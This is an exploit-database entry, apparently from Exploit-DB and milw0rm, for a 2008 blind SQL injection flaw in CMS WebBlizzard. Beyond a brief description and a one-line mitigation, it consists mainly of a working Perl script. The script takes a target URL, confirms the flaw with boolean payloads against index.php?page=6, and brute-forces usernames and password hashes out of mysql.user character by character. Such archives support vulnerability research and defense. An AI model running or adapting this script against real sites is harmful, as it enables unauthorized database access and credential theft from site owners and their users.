CMS WebBlizzard Blind SQL Injection Exploit

vendor:

CMS WebBlizzard

by:

Bl@ckbe@rD

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: CMS WebBlizzard

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CMS WebBlizzard Blind SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL queries into a vulnerable web application. The exploit is a blind SQL injection, meaning that the attacker can not see the results of the query, but can determine if the query was successful or not. The exploit is used to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Input validation and proper sanitization of user input can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

#/usr/bin/perl

#|+| Vendor Not Notified
#|+| Author: Bl@ckbe@rD
#|+| Discovered On: 10 june  2008
#|+| greetz: InjEctOrs , underz0ne crew 
#--//-->
# -- CMS webBlizzard  Blind SQL Injection Exploit --
#--//--> Exploit :
use strict;
use LWP::Simple;

print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n";
print "-                                                                  -\n";
print "-                                                                  -\n";
print "-                                                                  -\n";
print "-         CMS WebBlizzard  Blind SQL Injection exploit             -\n";
print "-                                                                  -\n";
print "-                                                                  -\n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n";

print "\nEnter URL (ie: http://site.com): ";
	chomp(my $url=<STDIN>);
	
if(inject_test($url)) {
	print "Injecting.. Please Wait this could take several minutes..\n\n";
	my $details = blind($url);
	print "Exploit Success! Admin Details: ".$details;
	exit;
}

sub blind {

	my $url    = shift;
	my $res    = undef;
	my $chr    = 48;
	my $substr = 1;
	my $done   = 1;
	
	while($done) {
		my $content = get($url."/index.php?page=6)  and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM 
mysql.user),".$substr.",1))=".$chr."/*");
		
		if($content =~ /Previous/ && $chr == 94) { $done = 0; }
			elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
				else { $chr++; }
	}
	return $res;
}

sub inject_test {

	my $url     = shift;
	my $true    = get($url."/index.php?page=6) and 1=1 /*");
	my $false   = get($url."/index.php?page=6) and 1=2 /*");
	
	if($true =~ /Previous/ && $false !~ /Previous/) {
		print "\nTarget Site Vulnerable!\n\n";
		return 1;
	} else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; }
}

# milw0rm.com [2008-07-03]